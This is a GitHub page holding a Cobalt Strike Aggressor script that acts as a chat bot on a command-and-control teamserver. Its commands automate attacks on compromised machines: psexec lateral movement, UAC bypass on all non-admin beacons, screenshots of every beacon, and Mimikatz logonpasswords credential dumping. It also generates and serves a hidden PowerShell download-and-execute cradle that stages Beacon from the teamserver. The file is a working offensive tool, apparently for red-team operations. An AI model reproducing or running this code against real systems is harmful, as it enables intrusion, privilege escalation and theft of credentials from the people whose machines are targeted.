-
Notifications
You must be signed in to change notification settings - Fork 40
/
bot.cna
190 lines (166 loc) · 5.9 KB
/
bot.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
# This is a bot for Cobalt Strike!
# Features:
# - Welcome users to your teamserver
# - Play ping pong
# - List beacons by ID
# - List listeners
# - PsExec from the event log
# - Automatically bypass UAC
# - Screenshot all beacons
# PsExec against $target from $bid
# TODO figure out how to use with make_token
sub psexecTarget {
($bid, $target, $listener) = @_; # @_ contains the arguments for the subroutine.
say("Owning $target with psexec_psh.");
bpsexec_psh($bid, $target, $listener);
}
# Attempt to bypass UAC on all non-admin shells
sub elevateAll {
$listener = $1;
# Iterate over all beacons with beacons()
foreach $b (beacons()) {
# Get the id field from $b
$bid = $b['id'];
if (!-isadmin $bid) {
say("Attempting to elevate beacon $bid");
bbypassuac($bid, $listener);
}
sleep(1000);
}
}
# Get PowerShell DownloadString payload
sub getDownloadString {
foreach $s (sites()) {
# Check if the site has powershell in the description
if ($s['Description'] hasmatch "powershell") {
# Build URL and DownloadString
$url = "http://" . $s['Host'] . ":" . $s['Port'] . $s['URI'];
$downloadString = "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('";
$downloadString .= $url . "'))\"";
println("Returning DownloadString: $downloadString");
say("Found Powershell DownloadString payload: \c9$downloadString\c0");
return true;
}
}
return false;
}
# Create PowerShell DownloadString payload
sub createDownloadString {
local ('$listener $script $host $url');
if (-istrue getDownloadString()){
println("DownloadString already exists!");
return;
}
else {
$listener = $1;
$host = listener_info($listener)['host'];
artifact_stageless($listener, "powershell", "x86", $null, $this);
yield;
$script = $1;
$url = site_host($host, "80", "/abc", $script, "text/plain", "Scripted Web Delivery(powershell)");
$downloadString = "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('";
$downloadString .= $url . "'))\"";
println("Returning DownloadString $downloadString");
say("Here's your DownloadString: \c9$downloadString\c0");
}
}
on event_join {
elog("User \c9$1\c7 joined! Welcome to the teamserver.");
}
on event_public {
if (substr($2, 0, 1) eq "!") {
@input = split(" ", $2); # Split incoming command on spaces
$cmd = @input[0]; # Command is !<cmd> arg1 arg2...
@args = sublist(@input, 1); # sublist gets everything after !cmd
# Log to script console for debug purposes
println("Command received: $cmd");
println("Arguments: " . @args);
if ($cmd eq "!ping") {
say("pong!");
}
# List all beacons by ID
else if ($cmd eq "!beacons") {
say ("Number of Beacons: " . size(beacons()));
foreach $b (beacons()) {
say("Beacon: $b['id'] on $b['computer'] as $b['user']");
}
}
# List all listeners
else if ($cmd eq "!listeners") {
foreach $l (listeners()) {
say("Listener: $l");
}
}
# psexec to target host from beacon
else if ($cmd eq "!psexec") {
if (size(@args) == 3) {
$bid = @args[0];
$target = @args[1];
$listener = @args[2];
# Log to script console for debug purposes
println("Beacon ID: $bid");
println("Target: $target");
println("Listener: $listener");
psexecTarget($bid, $target, $listener);
}
}
# Elevate all non-admin beacons
else if ($cmd eq "!elevate") {
$listener = @args[0];
elevateAll($listener);
}
# Screenshot all beacons
else if ($cmd eq "!screenshot") {
foreach $b (beacons()){
bscreenshot($b['id']);
sleep(1000);
}
}
# Get DownloadString to stage Beacon
else if ($cmd eq "!downloadstring") {
if (!@args) {
getDownloadString();
}
else {
$listener = @args[0];
createDownloadString($listener);
}
}
else if ($cmd eq "!checkin") {
foreach $b (beacons()){
bcheckin($b['id']);
sleep(1000);
}
}
else if ($cmd eq "!mimikatz") {
foreach $b (beacons()) {
blogonpasswords($b['id']);
sleep(1000);
}
}
else if ($cmd eq "!help") {
say("Beep boop! Here are my commands:");
say("ping:\t\t\tPong!");
say("beacons:\t\t\tList all beacons.");
say("listeners:\t\t\tList all listeners.");
say("psexec <bid> <target> <listener>:\tSpawn a shell on <target> from <bid>.");
say("elevate:\t\t\tAttempt to bypass UAC on all non-admin beacons.");
say("screenshot:\t\t\tAttempt to screenshot all beacons.");
say("downloadstring:\t\t\tGet a Powershell DownloadString payload.");
say("checkin:\t\t\tAsk all beacons to checkin.");
say("mimikatz:\t\t\tTask all beacons to run logonpasswords.");
}
}
}
on beacon_initial {
# If incoming beacon is admin, call it out in event log
if (-isadmin $1) {
# $1 for beacon_initial event is beacon ID, have to get metadata with bdata($1)
$b = bdata($1);
say("\c5New admin beacon: \c2" . $b['user'] . "@" . $b['computer'] . "\c5!");
}
}
# Log all beacon tasks to event log for debugging purposes
on beacon_tasked {
elog("Beacon $1 tasked: $2");
}